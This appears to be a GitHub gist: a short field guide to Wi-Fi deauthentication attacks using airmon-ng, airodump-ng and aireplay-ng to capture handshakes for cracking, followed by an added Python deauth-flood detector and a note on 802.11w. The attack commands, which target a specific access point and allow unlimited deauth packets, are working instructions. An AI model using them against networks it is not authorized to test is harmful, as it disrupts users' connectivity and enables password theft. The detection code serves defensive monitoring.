@0xjmux
Last active March 28, 2018 00:50

Wifi captures and deauthentication

This is a little doc teaching you how to do wifi attacks. I always forget how to do it in the field, so here's a guide for when you're away from wifi. It's quick and doesn't overreach on the info, so you can reference it quickly. Every command here must be run as root.

We're going to assume wlan0 is the network interface you want to use. If you have time, read the man pages.

  1. Starting your receiver into monitor mode

     airmon-ng start wlan0

     When you're done, you can do airmon-ng stop wlan0mon.

  2. Capturing nearby networks

     Your wireless interface should be renamed to something along the lines of wlan0mon.

     airodump-ng -c 10 --bssid 00:1C:B3:09:85:15 wlan0mon

    • -c 10 is the channel (if you don't know it, leave it out)
    • --bssid 00:1C:B3:09:85:15 is the MAC address of the access point (again, if you don't know it, leave it out)
    • wlan0mon is the interface (you have to include this)
  3. Deauthentication

     aireplay-ng -b 00:1C:B3:09:85:15 -0 5 wlan0mon

    • -b stands for bssid, which is the MAC address of the access point you want to deauth
    • -0 5 selects deauthentication attack, and sends 5 deauth packets (set to 0 to send an unlimited number)
    • wlan0mon is the interface

If your airodump says you've captured the hashes, you're good to go with cracking!
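
Seen from the defending side, the deauthentication step in item 3 shows up on the air as a burst of 802.11 management frames. The Python sketch below is an added example, not part of the original gist: it parses radiotap-wrapped frames from a monitor-mode capture and flags any BSSID that sources an unusual number of deauthentication frames inside a short window. The function names, the threshold and window values, and the sample frames are assumptions constructed for illustration.

```python
import struct
from collections import defaultdict, deque

DEAUTH_FC0 = 0xC0  # frame-control byte 0: version 0, type 0 (management), subtype 12
def mac(raw):
    return ":".join(f"{b:02x}" for b in raw)

def parse_deauth(pkt):
    """Return (dst, src, bssid, reason) for a radiotap-wrapped deauth frame, else None."""
    if len(pkt) < 4:
        return None
    rt_len = struct.unpack_from("<H", pkt, 2)[0]  # radiotap length, little-endian
    dot11 = pkt[rt_len:]
    if len(dot11) < 26 or dot11[0] != DEAUTH_FC0:
        return None
    reason = struct.unpack_from("<H", dot11, 24)[0]  # reason code follows the 24-byte header
    return mac(dot11[4:10]), mac(dot11[10:16]), mac(dot11[16:22]), reason

def detect_floods(packets, threshold=10, window=1.0):
    """packets: iterable of (timestamp_s, bytes). Returns {bssid: time the threshold was hit}."""
    recent, alerts = defaultdict(deque), {}
    for ts, pkt in packets:
        parsed = parse_deauth(pkt)
        if parsed is None:
            continue
        q = recent[parsed[2]]
        q.append(ts)
        while ts - q[0] > window:  # drop frames older than the window
            q.popleft()
        if len(q) >= threshold:
            alerts.setdefault(parsed[2], ts)
    return alerts

# --- constructed sample capture (not real traffic) ---
def frame(fc0, dst, src, bssid, body):
    addrs = b"".join(bytes.fromhex(m.replace(":", "")) for m in (dst, src, bssid))
    radiotap = bytes.fromhex("0000080000000000")  # minimal 8-byte radiotap header
    return radiotap + bytes([fc0, 0, 0, 0]) + addrs + b"\x00\x00" + body

AP = "00:1c:b3:09:85:15"     # BSSID from the commands above
OTHER = "02:00:00:00:00:01"  # constructed second AP
BCAST, REASON7 = "ff:ff:ff:ff:ff:ff", struct.pack("<H", 7)
SAMPLE = [(i * 0.05, frame(0xC0, BCAST, AP, AP, REASON7)) for i in range(12)]
SAMPLE += [(2.0, frame(0x80, BCAST, AP, AP, bytes(12))),     # beacon: ignored
           (5.0, frame(0xC0, BCAST, OTHER, OTHER, REASON7))]  # lone deauth: below threshold

if __name__ == "__main__":
    for bssid, ts in detect_floods(SAMPLE).items():
        print(f"deauth flood: bssid={bssid} threshold reached at t={ts:.2f}s")
```

Where the access point and clients support 802.11w (Protected Management Frames), enabling it causes PMF-capable clients to discard forged deauthentication frames; a counter like this one is for monitoring networks where that is not yet in place.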
